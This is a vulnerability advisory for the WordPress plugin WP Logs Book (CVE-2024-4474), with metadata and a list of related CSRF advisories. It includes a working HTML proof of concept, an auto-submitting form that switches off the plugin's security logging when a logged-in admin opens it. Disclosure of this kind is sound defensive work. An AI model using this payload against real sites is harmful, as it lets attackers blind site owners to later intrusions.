WP Logs Book <= 1.0.1 – Disable Logging via CSRF | CVE 2024-4474 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make an admin open an HTML file containing:


```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wp-logs-book" method="POST"> 
        <input name="wplb_error_404_log" type="text" value="0">
        <input name="wplb_login_attack_log" type="text" value="0">
        <input name="wplb_save" type="text" value="Save">
        <input type="submit" value="submit">
    </form>
</body>
```

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

71954c60-6a5b-4cac-9920-6d9b787ead9c

Timeline

Publicly Published

2024-05-31 (about 1 year ago)

Added

2024-05-31 (about 1 year ago)

Last Updated

2024-05-31 (about 1 year ago)

Other

Published

Title

Published

2025-07-23

Title

Affiliate Plus <= 1.3.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-06-05

Title

CubePoints <= 3.2.1 - Cross-Site Request Forgery

Published

2023-11-23

Title

Simple Testimonials Showcase <= 1.1.5 - Cross-Site Request Forgery

Published

2025-03-11

Title

Comment Date and Gravatar remover <= 1.0 - Cross-Site Request Forgery

Published

2014-08-01

Title

GuiForm 1.4.10 - class/class-ajax.php Entry Saving CSRF